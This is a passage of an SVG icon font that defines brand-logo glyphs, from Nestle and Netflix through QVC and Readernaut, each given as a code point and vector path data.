<glyph glyph-name="brand-nestle" horiz-adv-x="1000" unicode="&#xe917;" d="M775 482h-22c-9 0-15-6-15-15v-234c0-9 6-16 15-16h22c8 0 15 7 15 16v234c0 9-7 15-15 15z m52-40h155c7 0 13 5 13 12v19c0 7-6 14-13 13 0 0-150-15-155-15-5-1-8-5-8-10v-11c0-5 4-8 8-8z m-111-32h-34v58c0 8-6 14-15 14h-22c-8 0-14-6-14-14v-58h-11c-6 0-11-5-11-11v-15c0-6 5-11 11-11h11v-94c0-32 24-62 62-62h21c6 0 12 6 12 12v17c0 6-6 11-12 11h-3c-19 0-29 12-29 29v87h34c6 0 11 5 11 11v15c0 6-5 11-11 11z m-383 7c-62 0-97-49-97-100 0-55 37-103 97-103 42 0 82 22 90 57 1 5-2 11-9 11h-30c-5 0-9-2-12-6-8-12-21-19-39-19-26 0-43 20-45 43h125c12 0 17 6 17 17 0 50-30 100-97 100z m-44-79c2 22 21 39 44 39s43-17 45-39h-89z m711-21c0 50-30 100-97 100-62 0-97-49-97-100 0-55 37-103 98-103 41 0 81 22 89 57 1 5-2 11-9 11h-29c-6 0-10-2-13-6-8-12-20-19-39-19-26 0-43 20-45 43h125c12 0 17 6 17 17z m-141 21c2 22 21 39 44 39s43-17 45-39h-89z m-270 102c6 0 11 5 11 12v17c0 6-5 11-11 11h-406c-9 0-16-8-16-17l1-159s-87 158-92 166c-4 7-13 14-26 14h-33c-9 0-17-7-17-16v-234c0-9 7-16 17-16h21c9 0 17 7 17 16l-1 164s88-159 91-166c6-8 14-15 27-15h30c9 0 17 8 17 17v206l370 0z m-28-108c-12 3-40 10-46 11-11 3-22 7-22 16 0 15 14 20 30 20 18 0 31-7 36-18 2-5 6-6 12-6h25c4 0 8 3 8 9 0 28-33 53-81 53-49 0-81-24-81-61 0-29 22-46 50-53 13-3 34-8 45-11 11-3 21-7 21-16 0-16-16-21-34-21-16 0-33 8-38 20-3 6-7 7-15 7h-24c-5 0-10-3-10-9v-3c0-27 37-56 87-56 36 0 86 15 86 63 0 28-19 47-49 55z" />
<glyph glyph-name="brand-netflix" horiz-adv-x="1000" unicode="&#xe918;" d="M1000 486h-43l-1-1-27-68-25 69h-42l44-125-52-129c14-2 28-3 42-5l30 76 29-83c15-2 30-4 45-6l-51 146 51 126z m-222-248c14-1 28-2 44-4v252h-44v-248z m-286 10c3 0 6 0 8 0 12 0 23 0 35 0v93h51v38h-51v67h59v40h-102v-238z m-163 198h39v-200c15 1 29 1 43 1v199h40v40h-122v-40z m-231-115l-55 155h-43v-272h0c14 2 27 4 41 5v150l50-143c16 1 31 3 47 5v255h-40v-155z m87-57v-39c33 3 67 5 102 7v39c-21-1-40-2-59-4v64h51v38h-51v67h59v40h-102v-212z m493 212h-42v-240c34-1 68-3 102-5v39c-20 1-40 2-60 3v203z" />
<glyph glyph-name="brand-nexus" horiz-adv-x="1000" unicode="&#xe919;" d="M55-128c-16 0-33 0-50 0-1 0-4-2-5 1-1 2 0 5 2 7 9 9 18 20 28 30 52 58 105 116 158 174l157 171c18 20 35 40 53 59 3 3 5 4 9 4 19 0 38 0 56 0 4 0 5 0 5-4 0-16 0-31 0-47 0-3-1-5-3-7-38-42-76-83-113-124l-151-165c-29-32-59-64-88-96-2-3-4-3-8-3-16 0-33 0-50 0z m511 511c-10 0-20 0-30 0-2 0-3 0-3 3 0 16 0 32 0 48 0 3 1 5 3 7 21 23 43 47 65 71l90 99c35 38 70 75 105 113 30 34 60 67 90 100 3 3 6 5 10 5 33-1 66-1 98-1 2 0 5 2 6-1 1-2-1-4-2-6-21-23-43-47-64-70-33-36-66-72-99-108l-99-109-98-107c-12-14-25-28-37-42-2-2-4-2-6-2-10 0-20 0-29 0z m-510 446c16 0 33 0 50 0 3 0 5-1 7-3 42-46 84-92 126-137l112-123 114-125c2-2 3-5 3-9 0-15 0-30 0-45 0-3 0-5-4-5-19 1-39 1-58 0-3 0-5 1-7 3-35 39-71 78-107 118-36 40-73 80-110 120-45 50-90 99-135 149-13 15-27 29-40 44-2 2-4 4-6 7-1 1-1 3 0 5 0 2 2 1 4 1h51z m889-957c-17 0-33 0-50 0-3 0-5 1-7 3-90 98-179 196-268 294-28 30-56 61-84 91-2 3-3 5-3 8 0 15 0 30 0 45 0 3 0 5 4 5 19 0 38 0 57 0 3 0 5-1 6-3 59-64 117-128 176-193l179-196c14-15 28-31 42-47 2-1 4-3 3-5-2-3-4-2-6-2-17 0-33 0-49 0z" />
<glyph glyph-name="brand-nike" horiz-adv-x="1000" unicode="&#xe91a;" d="M1000 521l-104-44c-209-88-418-177-627-265-52-21-104-38-161-36-52 2-95 33-105 79-5 24-4 48 3 71 21 78 72 136 125 194-9-25-19-50-23-77-11-67 28-114 95-116 56-3 107 16 159 30 211 55 421 111 631 167 2 0 4 0 6 0 0-1 1-2 1-3z" />
<glyph glyph-name="brand-nokia" horiz-adv-x="1000" unicode="&#xe91b;" d="M179 311l-96 118h-83v-158h48v120l97-120h82v158h-48v-118z m214 121h-82c-29 0-44-4-54-15-7-7-11-14-11-36v-61c0-22 4-30 11-37 10-11 25-14 54-14h82c29 0 43 3 54 14 6 7 10 15 10 37v61c0 22-4 29-10 36-11 11-25 15-54 15z m19-106c0-9-1-12-4-14-2-3-6-3-17-3h-78c-11 0-15 0-18 3-2 2-3 5-3 14v48c0 10 1 12 3 15 3 2 7 2 18 2h78c11 0 15 0 17-2 3-3 4-5 4-15v-48z m65 103v-158h50v158h-50z m202 0h-67l-85-76 92-82h71l-101 84 90 74z m21 0h50v-158h-50v158z m211 0h-63l-89-158h56l14 27h98l15-27h58l-89 158z m-64-96l31 57 32-57h-63z" />
<glyph glyph-name="brand-nvidia" horiz-adv-x="1000" unicode="&#xe91c;" d="M373 484v59c6 1 12 1 18 1 163 5 271-140 271-140s-116-161-240-161c-18 0-34 3-49 8v181c64-8 77-36 115-100l85 72s-62 82-167 82c-11 0-22-1-33-2z m0 197v-89c6 0 12 1 18 1 227 7 375-187 375-187s-170-207-347-207c-16 0-31 2-46 4v-55c12-1 25-2 38-2 165 0 285 84 400 184 19-16 98-53 114-69-110-92-366-166-511-166-14 0-27 0-41 2v-78h627v662h-627z m0-430v-47c-152 27-195 185-195 185s74 82 195 95v-52h0c-64 8-114-52-114-52s28-100 114-129z m-271 145s91 134 271 147v49c-200-16-373-186-373-186s98-283 373-309v51c-202 26-271 248-271 248z" />
<glyph glyph-name="brand-omega" horiz-adv-x="1000" unicode="&#xe91d;" d="M186 15c-111 128-179 265-150 433 15 90 56 165 123 226 164 148 451 155 628 17 108-84 151-199 155-329 5-129-43-242-135-345 57-8 102-20 131 35 10 20 27 32 49 20 21-12 12-30 5-48-42-111-42-111-161-111-67 0-135-1-202 0-15 1-36-9-43 13-7 18 1 33 18 46 99 77 148 181 170 302 31 167-50 330-202 404-66 32-130 29-193-7-221-126-247-363-117-565 34-52 80-94 132-129 19-12 31-25 26-48-5-29-29-16-44-16-86-2-171 1-257-2-34-1-54 8-67 40-9 20-23 38-33 57-10 20-33 42-7 63 22 17 40-6 56-20 51-41 51-41 118-36z" />
<glyph glyph-name="brand-opensuse" horiz-adv-x="1000" unicode="&#xe91e;" d="M741 556c0 10 0 19 0 28 0 4 1 5 5 4 59-9 116-20 172-41 15-6 29-12 41-24 8-9 13-19 17-29 10-22 18-45 24-69 0-3 1-6-3-8-22-16-45-29-73-30-19-2-37 3-55 9-34 11-65 29-95 48-2 1-4 2-7 3 5-13 11-25 16-37 0-1 2-2 3-2 32-16 65-31 100-40 30-8 58 0 85 11 6 3 12 6 18 9 3 1 5 2 7 1 2-2 0-4 0-6-3-18-13-29-29-37-59-29-121-36-186-30-17 2-35 5-53 4-29-1-42-14-43-43-1-24 8-46 19-67 6-13 14-24 21-36-3-2-5 0-7 1l-67 32c-4 1-8 4-10 7-15 16-30 33-44 49-21 22-46 39-76 44-25 4-49 2-71-12-20-13-25-33-27-55-1-16-1-33 2-49 1-1 0-2 0-4-8 4-16 8-23 12-12 5-23 11-35 16-4 2-5 5-7 9-17 72-63 118-131 141-37 12-75 10-110-10-40-22-60-68-52-111 10-46 45-80 92-85 16-2 33-2 48 4 30 10 47 42 39 74-8 32-38 53-69 48-16-3-26-13-27-26-1-14 11-25 25-22 4 1 7 2 11 3 11 2 22-3 26-14 4-10 0-22-10-27-26-14-55-12-78 10-37 35-24 95 25 117 46 20 106 0 134-46 43-72 1-160-82-176-85-15-168 34-193 116-15 46-8 91 12 135 26 57 68 102 119 138 65 46 136 79 214 95 53 11 106 11 159 10 78-2 153-18 226-41l3-1z m154-26c-32 0-59-26-59-58 0-33 27-60 59-60 33 0 60 27 59 60 0 32-27 58-59 58z m0-17c23 0 42-19 42-42 0-22-19-41-42-41-22 0-41 19-41 42 0 22 18 41 41 41z m9-45c10 0 18 6 18 12-1 7-8 12-18 12h-1c-10 0-18-6-18-12 1-7 9-13 19-12z" />
<glyph glyph-name="brand-oracle" horiz-adv-x="1000" unicode="&#xe91f;" d="M432 330h66l-35 57-64-102h-29l78 122c3 5 9 8 15 8 6 0 12-3 15-8l78-122h-29l-14 23h-67l-14 22z m303-22v106h-25v-117c0-3 1-6 4-8 2-3 5-4 9-4h113l14 23h-115z m-410 19c24 0 44 19 44 43s-20 44-44 44h-108v-129h25v106h82c11 0 20-9 20-21s-9-21-20-21h-70l74-64h36l-50 42 11 0z m-261-42c-35 0-64 29-64 64 0 36 29 65 64 65h75c36 0 65-29 65-65 0-35-29-64-65-64 0 0-75 0-75 0z m74 23c23 0 41 18 41 41 0 23-18 42-41 42l-72 0c-23 0-42-19-42-42 0-23 19-41 42-41l72 0z m470-23c-36 0-65 29-65 64 0 36 29 65 65 65h89l-15-23h-72c-23 0-42-19-42-42 0-23 19-41 42-41h89l-15-23h-76z m303 23c-19 0-35 13-40 30h105l15 23h-120c4 17 21 30 40 30h72l15 23h-89c-35 0-64-29-64-65 0-35 28-64 64-64h76l15 23h-89z" />
<glyph glyph-name="brand-panasonic" horiz-adv-x="1000" unicode="&#xe920;" d="M189 386c-41 0-55-14-54-39h36c1 9 9 13 15 13 4 0 13-1 13-8 0-23-70-2-70-49 0-22 22-31 34-30 15 0 27 3 39 14l4-11h36c-2 4-2 66-2 66 0 25-3 44-51 44z m-8-90c-8 0-12 6-12 11 0 8 18 8 32 15 1-14-6-26-20-26z m780 23c-1-8-5-18-16-18-13 0-20 12-20 28 0 12 5 28 20 28 5 0 8-1 11-4 2-2 4-6 4-10h39c-3 30-27 42-54 42-34 0-59-20-59-56 0-34 26-56 59-56 28 0 51 15 55 46l-39 0z m-119 62h40v-105h-40v105z m0 43h40v-27h-40v27z m-185-38c-35 0-59-21-59-57 0-35 26-56 59-56 33 0 59 21 59 58 0 32-23 55-59 55z m0-85c-10 0-18 11-18 30 0 12 5 26 18 26 11 1 19-11 19-26 0-20-8-30-19-30z m-130 55c0 5 5 7 12 7 4 0 8-1 10-2 1-1 4-4 4-8h37c-1 27-28 33-52 33-21 0-49-8-49-35 0-43 66-27 66-43 0-8-6-10-15-10-4 0-8 2-11 4-3 2-4 5-4 10h-37c1-29 27-40 51-40 43 0 56 19 56 40 0 42-68 29-68 44z m-97 30c-40 0-54-14-53-39h36c1 9 9 13 15 13 4 0 13-1 13-8 0-23-70-2-70-49 0-22 22-31 34-30 15 0 27 3 38 14l5-11h36c-2 4-2 66-2 66 0 25-3 44-52 44z m-8-90c-8 0-11 6-11 11 0 8 18 8 31 15 1-14-5-26-20-26z m-352 132h-70v-152h45v47h27c40 0 60 22 60 52 0 29-21 53-62 53z m-2-72h-23v35h17c10 0 25-3 25-16 0-12-8-19-19-19z m727 30c-15 0-22-3-36-16l0 12h-37v-106h37v55c0 14 7 22 19 22 12 0 15-7 15-17v-60h40v65c0 28-11 45-38 45z m-469 0c-15 0-22-3-36-16l0 12h-38v-106h40v55c0 14 5 23 17 23 12 0 14-8 14-18v-60h41v65c0 28-11 45-38 45z" />
<glyph glyph-name="brand-paypal" horiz-adv-x="1000" unicode="&#xe921;" d="M675 483h-78c-5 0-10-4-11-9l-31-200c-1-3 2-7 6-7h40c4 0 7 3 8 6l9 57c0 5 5 9 10 9h25c51 0 81 25 88 74 4 21 0 38-10 50-11 13-30 20-56 20z m9-73c-4-28-26-28-46-28h-12l8 52c1 3 3 6 7 6h5c14 0 27 0 34-8 4-5 5-12 4-22z m-564 73h-78c-5 0-10-4-10-9l-32-200c-1-3 3-7 7-7h37c5 0 10 4 10 9l9 54c1 5 5 9 11 9h24c51 0 81 25 89 74 3 21 0 38-10 50-11 13-31 20-57 20z m9-73c-4-28-26-28-46-28h-12l8 52c1 3 4 6 7 6h5c14 0 27 0 34-8 4-5 6-12 4-22z m224 1h-38c-3 0-6-2-6-5l-2-11-2 4c-8 12-26 16-44 16-41 0-77-32-83-75-4-22 1-43 13-58 12-13 28-18 47-18 34 0 52 21 52 21l-2-11c0-3 3-7 7-7h33c6 0 10 4 11 9l20 128c1 4-2 7-6 7z m-52-72c-4-22-21-36-42-36-11 0-20 4-25 10-6 7-8 16-6 26 3 21 20 36 42 36 10 0 19-3 24-10 6-7 8-16 7-26z m606 72h-37c-3 0-6-2-6-5l-2-11-2 4c-9 12-26 16-44 16-42 0-77-32-84-75-3-22 2-43 14-58 12-13 28-18 47-18 33 0 52 21 52 21l-2-11c-1-3 2-7 6-7h34c5 0 10 4 11 9l20 128c0 4-3 7-7 7z m-52-72c-3-22-20-36-42-36-10 0-19 4-25 10s-7 16-5 26c3 21 20 36 41 36 11 0 20-3 25-10 6-7 8-16 6-26z m-304 72h-37c-4 0-7-2-9-5l-52-76-22 73c-1 5-6 8-10 8h-37c-5 0-8-4-6-8l41-121-39-55c-3-4 0-10 5-10h38c3 0 7 1 9 4l124 180c3 4 0 10-5 10z m400 67l-32-204c0-3 3-7 7-7h32c5 0 10 4 11 9l31 200c1 3-2 7-6 7h-36c-4 0-6-2-7-5z" />
<glyph glyph-name="brand-pepsi" horiz-adv-x="1000" unicode="&#xe922;" d="M772 695c9 24 2 34-17 46-77 50-162 75-253 76-20 0-40-1-59-4-346-43-525-436-331-724 10-14 18-17 35-12 307 106 516 311 625 618z m131-139c2-12 4-24 4-37 2-149-70-253-202-317-69-35-144-51-218-68-114-26-228-50-341-85 149-185 448-233 657-54 211 180 190 461 94 594 2-12 5-23 6-33z m-405 294c-276-1-498-227-497-504-1-258 211-496 501-496 275 0 498 226 497 502-1 275-227 499-501 498z m7-991c-257-5-491 202-496 481-5 273 210 495 482 501 273 5 495-211 500-486 5-270-213-492-486-496z" />
<glyph glyph-name="brand-philips" horiz-adv-x="1000" unicode="&#xe923;" d="M379 438h54v-176h-54z m-93-70h-56v70h-54v-176h54v69h56v-69h53v176h-53z m-220 74c-22 0-48-2-66-4v-176h54v42h19c50 0 82 26 82 71 0 49-34 67-89 67z m-3-106h-9v72c3 1 6 1 9 1 26 0 39-13 39-35 0-23-11-38-39-38z m534 102h54v-176h-54z m318-45c0 10 10 14 25 14 17 0 36-4 48-9l-4 39c-14 2-27 5-49 5-44 0-73-17-73-53 0-62 84-50 84-78 0-11-8-17-28-17-18 0-45 6-61 14l5-41c17-6 39-9 56-9 45 0 82 15 82 59 0 59-85 48-85 76z m-159 49c-21 0-47-2-65-4v-176h54v42h19c50 0 81 26 81 71 1 49-33 67-89 67z m-2-106h-9v72c3 1 6 1 9 1 26 0 39-13 39-35 0-23-11-38-39-38z m-228 102h-54v-176h98l8 35h-52z" />
<glyph glyph-name="brand-pizza-hut" horiz-adv-x="1000" unicode="&#xe924;" d="M311 297s27 57-24 99c-51 42-125 21-153 3-29-19-19-39-16-41 3-3 10-7 40 5 0 0-77-88-114-274 0 0-6-46 11-48 18-2 28 24 34 40 3 7 116 269 96 284 0 0 71 4 78-45 8-48-67-85-88-89-22-5-22-13-20-15 1-1 6-7 34-3 28 4 93 24 122 84z m113 106c-1 22-7 24-14 23-8-1-9-11-9-11-54-72-60-95-63-117-3-21 8-48 25-48 17-1 11 14 11 14 0 4 15 39 23 53 18 31 29 64 27 86z m295-112c-1 3-6 5-11 2-6-2-26-6-37-7-12-2-38 0-86 9-49 8-90 0-90 0l61 58s39 42 44 58c5 15-6 22-13 23-8 1-63 0-82-3-18-3-32-2-42-1-11 1-15-8-15-8-11-22 27-27 27-27 25-3 71 7 71 7-78-64-120-103-129-116-5-9-14-25-3-37 11-13 37 1 37 1 32 9 91 8 91 8s30 0 82-1c53-2 81 16 89 21 8 5 9 9 6 13z m65 55c-2 6-9 4-11 3-1 0-4 0-15-2s-45 4-51 5c-5 0-26 2-26 2 3 1 76 76 76 76s22 24 10 37c-15 15-41 10-41 10s-85-12-89-11c-5 1-8 2-11 2-4 0-8-2-10-4-8-7-3-19-3-19 2-6 8-12 14-14 12-5 83 4 83 4l-84-69s-21-15-29-36c-7-20 6-21 8-21 1 0 15 4 28 5 13 1 49-1 61-2 13 0 43 1 64 10 20 9 28 18 26 24z m-393-270c0-2-9-33-10-54 0-21 9-30 18-31 9-1 19 6 27 18 8 12 28 99 28 99l29 19s7 6 5 11c-3 4-8 2-8 2l-20-8s13 76 15 89c2 12-9 13-12 13-2 0-8-1-24-29-17-27-34-88-34-88l-75-16s50 128 25 127c-26-1-87-140-87-140s-30-4-47-7c0 0-13-2-15-12-1-9 4-15 4-15 6-9 41-12 41-12-8-24-18-66-18-79 1-13 3-34 18-36 12-2 26 6 33 18 6 12 29 103 29 103 11 1 78 28 78 28z m530-3c-2 7-8 6-8 6s-28-2-90-9c-32-4-76-14-110-23l20 60 29 79c12 2 118 45 118 45s11 5 10 9c-1 5-8 3-8 3l-103-19 14 29s8 17-3 25c-11 7-17-2-17-2-7-6-41-62-41-62s-23-4-27-4c-5-1-10 0-10 0-8 4-27 1-26-16l45-16v-1s-16-43-21-68c-4-26-2-63-2-66 0 0 0-1 1-2-19-6-32-10-32-10l-61-19-180-72s-69-31-95-39c-27-10-22-29-22-29 2-9 6-18 25-21 19-4 42 5 42 5s192 84 206 90c16 6 149 63 337 120 0 0 10 1 9 7z m67 318c-1 3-19 5-26 6-7 0-13 4-16 12-2 7 8 31 12 48 5 16-5 22-10 23-5 0-12-5-12-5-68 15-145-57-150-90-3-23 4-39 23-44 19-4 37 3 52 9 15 6 45 29 45 29 3-7 19-15 34-15 15-1 41 11 45 14 4 3 4 9 3 13z m-88 29c-1-4-2-10-2-10s-24-14-34-18c-12-5-26-4-26-4 14 47 73 56 73 56s-9-20-11-24z m-475 42c12 11 48 66 51 71 2 5 4 10 1 13-3 4-11 0-11 0s-17-5-38-18c-21-13-31-33-34-40-3-7-5-24 4-29 9-5 20-4 27 3z m233-277c-7 17-21 5-21 5-8-6-24-38-24-38-13-22-76-61-76-61 8 20 9 40 8 52-1 12-11 29-25 32-15 3-29-1-32-5-4-3-2-7 5-11 7-3 10-11 10-11 2-3 0-9 0-10 0-1-13-39-13-39s-11-37 5-49c16-12 27-11 53 1l56 55c-1-29 16-44 26-52 10-8 16-5 16-5 10 5 4 14 3 15-1 2 0 54 4 81 5 26 5 40 5 40z m-355 475c1 0 3 0 3 1 0 0 62 91 62 91l130 31s115 36 117 37c2 0 11 5 8 14-3 10-13 8-13 8l-49-12s-192-55-199-58c-8-2-10-8-10-8-19-33-49-94-51-98-1-4 1-5 2-6z m368 109s6-41 9-49c4-8 29-16 29-16 49-12 239-80 239-80s12-5 14-5c2 0 9 1 11 8 3 6-3 12-3 12-1 1-6 3-6 3-52 27-156 64-161 65-5 1-100 29-100 29s-28 78-30 83c-2 5-15 29-15 29s-1 3-2 2c-2-1-1-3-1-3l16-78z m-287-247l21 4c4 5 10 9 16 13 20 12 37 18 40 19 8 3 19 4 25-3 4-3 6-7 6-14l8 1 1 0c110 19 352 35 352 35 8 2 32 10 28 33-4 19-35 20-40 20-4-1-317-42-338-45-113-19-307-68-307-68l-120-35c3 5 98 72 103 76 6 4 117 72 117 72s8 4 6 9c-3 5-7 4-7 4s-7-3-27-12c-38-16-100-53-100-53-49-27-150-110-150-110s-11-7-5-19c5-12 19-11 19-11l148 40c11 5 204 44 204 44z m538-493v0c2 1 4 2 4 5 0 2-1 3-2 4-1 1-3 2-6 2-3 0-4 0-6-1v-19h3v8h3c2 0 3-1 4-4 0-2 1-4 1-4h4c-1 0-1 1-2 4 0 3-1 5-3 5z m-4 1h-3v7c1 0 2 0 3 0 3 0 5-1 5-3 0-3-3-4-5-4z m1 17h0c-10 0-18-7-18-17 0-10 8-18 18-18 10 0 17 8 17 18 0 10-7 17-17 17z m0-32c-8 0-14 6-14 15s6 15 14 15h0c8 0 14-7 14-15s-6-15-14-15z" />
<glyph glyph-name="brand-playstation" horiz-adv-x="1000" unicode="&#xe925;" d="M538-39l-152 66v712s332-56 377-194c46-138-25-227-50-230-70-7-96 36-96 36v223l-76 32-3-645z m40 98v-83s360 116 412 161c53 45-123 156-218 134 0 0-101-5-193-44-1-1 0-76 0-76l232 55 82-36-315-111z m-231 6s-47-24-151-23-197 31-196 94c1 63 173 132 346 161v-89l-184-48s-31-40 11-41c96-3 175 23 175 23l-1-77z" />
<glyph glyph-name="brand-puma" horiz-adv-x="1000" unicode="&#xe926;" d="M98 735c4-6 9-13 14-21 11 9 20 15 28 21 6-8 12-17 19-25 2-3 6-5 9-6 76-9 138-48 196-93 44-33 85-69 127-104 40-32 84-59 134-72 62-17 112-2 148 52 25 39 43 83 63 124 23 49 54 91 103 117 6 3 12 7 19 9 28 8 48-10 40-38-4-13-14-25-23-36-4-5-10-8-16-10-72-28-114-83-140-153-16-42-38-79-77-104-3-2-6-13-3-16 29-38 33-84 38-128 3-20 2-40 2-60 1-27 13-49 35-64 14-9 20-20 22-37 1-16 10-30 15-45 2-8 6-17 5-25 0-15-4-30-5-45 0-13-4-17-17-15-25 4-38 21-43 44-4 19-5 39-5 58-1 15-4 25-16 34-61 46-107 104-134 176-24 64-68 99-139 95-17 0-33 4-50 6-59 9-108 36-149 79-3 3-6 6-9 9-25 24-24 24-54 6-26-17-55-15-82-5-25 8-49 19-73 29-15 7-25 7-28-13-3-13-11-15-23-13-15 4-29 13-29 29 0 12 8 29 18 36 25 19 56 19 86 14 12-2 22-4 27 10 4 15-2 26-17 30-9 2-19 3-27 1-17-4-30 0-41 13-6 7-14 11-21 17-12 10-14 19-2 32 8 8 12 19 18 28 1 3 2 6 4 8 17 16 33 32 53 51z" />
<glyph glyph-name="brand-qatar-air" horiz-adv-x="1000" unicode="&#xe927;" d="M1000 693c-1 2-5 4-7 5-3 1-6 0-8-1-85-24-169-51-250-84-95-37-186-82-271-138-2-1-6-1-8-1 1 3 2 6 4 8 28 18 56 38 84 55 50 30 101 58 150 88 83 51 167 101 257 141 2 1 4 1 5 3 2 2 4 7 3 9-2 2-6 4-9 5-4 0-8-2-11-3-22-9-44-16-65-26-103-44-200-100-294-162-4-2-9-4-14-4-24 1-48 2-72 3-44 1-88 3-132 3-63 1-126 2-189 2-9 0-19-3-28-7-8-3-8-10 0-14 7-3 15-6 22-6 56 0 112 0 167 1 70 2 140 4 211 6 2 0 5 0 10 0-3-3-4-4-6-5-14-10-30-19-43-31-19-16-39-25-64-18-1 0-1 0-1 0-42 0-84 1-126 2-69 0-138 1-207 1-8 0-17-2-25-5-5-3-8-8-12-13 4-3 8-9 12-11 13-3 26-7 38-7 82 1 163 2 245 4l36 1c12 0 25 0 39 0-17-14-31-25-45-37-6-5-11-7-19-7-22 1-44 2-66 2-78 1-157 2-235 1-12 0-25-4-37-9-12-5-12-15 0-22 2-1 4-2 6-3 13-2 27-6 40-6 36-1 72 0 108 1 47 0 93 1 139 2 5 0 9 0 12 0-10-11-19-21-29-32-5-5-10-7-17-6-21 0-42 1-63 1-32 1-63 2-95 2-31 0-63 0-94-2-11-1-23-7-33-12-8-5-8-11 0-17 5-4 11-7 18-8 32-9 65-5 97-5 47 0 93 0 141 0-6-7-13-13-18-20-7-10-15-13-26-12-59 1-117 1-175 1-16 0-31-3-43-12-10-7-10-14 1-20 7-4 15-8 23-9 38-7 76-3 115-3 19 0 39 0 60 0-6-9-12-16-17-24-4-5-7-7-13-7-39 1-78 1-117 1-15-1-30-3-43-11-11-7-12-17 1-22 11-5 23-9 35-10 31-1 61-1 92-1h10c-1-10 2-17 10-18 6 0 13 2 19 5 7 4 13 9 20 14 0-5 0-9-1-11-9-13-20-22-36-23-31 0-62 1-92 0-12 0-23-5-34-9-4-1-9-7-9-11 0-4 5-8 9-11 1-2 3-2 5-3 14-2 29-7 43-7 57 0 113 1 170 2 61 1 122 2 183 3 3 0 7 0 8-2 10-14 20-28 30-43-5 0-7-1-10-1-41 1-81 2-122 3-78 1-156 2-234 2-11 0-22-3-32-7-4-1-9-7-9-10 0-4 5-9 9-11 11-3 22-7 34-7 40-1 80 0 120 1 78 1 157 2 235 4 19 1 34-1 42-20 0 0 1-1 2-2 8-10 17-21 27-33-5 0-8 0-11 0-15 1-29 2-44 2-39 1-78 2-117 2-65 2-131 3-197 3-9 0-19-4-28-8-7-3-7-9 0-12 6-3 13-6 19-7 16-1 32-1 47-1 39 0 78 0 118 1 73 2 146 5 219 7 4 0 9-2 12-5 8-6 14-13 21-20 4-4 7-4 12-1 17 13 34 25 51 37 7 5 12 11 20 18-13 2-23 3-34 4-10 2-21 2-33 9 6 2 10 4 14 4 21 3 41 5 61 7 10 1 18 3 24 12 7 12 15 22 23 34-51 5-101 4-149 16 3 3 7 5 11 5 25 3 50 6 74 8 25 2 49 3 74 4 3 0 8 1 9 3 6 12 11 24 16 37-69 5-137 4-204 16v5c72 13 144 12 216 17 3 13 5 25 7 38-38 2-74 4-111 6-36 2-73 3-108 14 73 14 148 14 223 19v33c-27 5-54 10-80 16-26 7-51 16-74 31 48 3 96 4 143 12-8 2-16 4-25 4-49 3-98 5-147 8-4 0-9 1-12 4-5 5-10 10-14 16-3 2-5 7-4 10 1 2 6 3 10 4 3 0 6 0 10 0 25-1 49 3 70 18 2 1 5 2 7 2 17 1 34 2 51 3 10 1 21 3 31 4l0 3c-26 2-53 5-79 7-46 2-92 3-138 5-3 0-5 2-8 3 1 3 2 6 4 9 1 2 3 3 5 4 17 11 34 22 52 33 4 2 9 3 13 3l81 4c10 1 20 2 30 4v2c-29 2-57 4-88 6 4 3 6 4 8 6 18 9 36 19 55 28 99 49 202 90 306 129 4 2 9 3 13 6 2 2 5 6 4 9z m-668-532c6 0 13 0 19 1 11 2 22 5 33 8 21 6 30 2 42-19-49 1-97 2-147 3 35 53 57 109 73 168-8-2-16-4-26-7 6 22 18 36 35 45 5 3 8 6 9 11 2 12 5 24 8 37 11-13 17-28 19-43 2-15 2-30 3-46 13 13 20 30 26 47 11-41 17-82-3-122-19-40-53-63-92-80 0-1 0-2 1-3z m179-231c-38 1-76 4-114 5-43 1-86 1-129 2-5 0-11-2-16-4-6-3-6-8 0-11 6-3 14-4 21-4 51 0 101 1 152 2 25 1 49 3 74 4 9 0 18 2 26 2l0 2c-4 0-9 1-14 2z m-257 705c1-1 4-2 6-2 16 0 33-1 49 0 55 1 109 2 163 4 17 0 34 2 51 4v2c-23 1-46 3-69 4-61 1-122 3-183 4-6 0-11-1-17-2-2-1-5-5-6-7 0-2 3-5 6-7z" />
<glyph glyph-name="brand-qvc" horiz-adv-x="1000" unicode="&#xe928;" d="M497 850c221 0 409-151 454-365 26-120 5-232-58-338-3-5-5-5-10-2-52 28-104 55-156 83-5 3-5 4-2 9 108 159 23 374-165 416-149 34-299-68-324-218-24-149 75-287 223-312 35-6 71-5 105 4 14 4 28 2 42 0 61-10 122-20 183-30 20-3 39-6 58-9 4-1 6-2 8-5 29-37 59-73 88-110 3-4 3-5-1-8-48-38-96-76-144-113-5-4-6-1-8 2-29 37-57 75-85 112-4 5-7 6-12 3-64-29-132-43-203-42-204 3-388 149-437 347-10 40-16 81-15 123 7 235 175 407 375 445 29 5 58 8 84 8z" />
<glyph glyph-name="brand-readernaut" horiz-adv-x="1000" unicode="&#xe929;" d="M36 447c24 79 87 94 98 96 62 146 208 248 378 248 171 0 317-103 379-249 1 0 3-1 6-2v196c-22 9-38 30-38 55 0 33 27 59 60 59s60-26 60-59c0-28-19-51-46-58v-211c20-14 40-37 51-75 0 0 20-97-13-122 0 0-16-22-62-40-4-14-8-27-13-40-18-3-36-6-56-10 29 50 45 107 45 167 0 195-169 352-377 352s-376-157-376-352c0-62 17-120 47-171-17 4-33 7-49 10-5 14-10 28-14 43l-1 0c-49 18-66 41-66 41-33 25-13 122-13 122z m464-434c-144 174-500 189-500 189v-132c322-2 500-220 500-220s178 218 500 220v132s-356-15-500-189z m340 328c0-42-8-81-22-118-110-25-243-72-318-163-72 87-197 134-304 160-15 38-24 78-24 121 0 182 150 329 334 329 185 0 334-147 334-329z m-491 52c0 20-17 37-38 37s-37-17-37-37 16-37 37-37 38 17 38 37z m89 93c0 32-26 57-58 57-32 0-58-25-58-57s26-56 58-56c32 0 58 25 58 56z" />
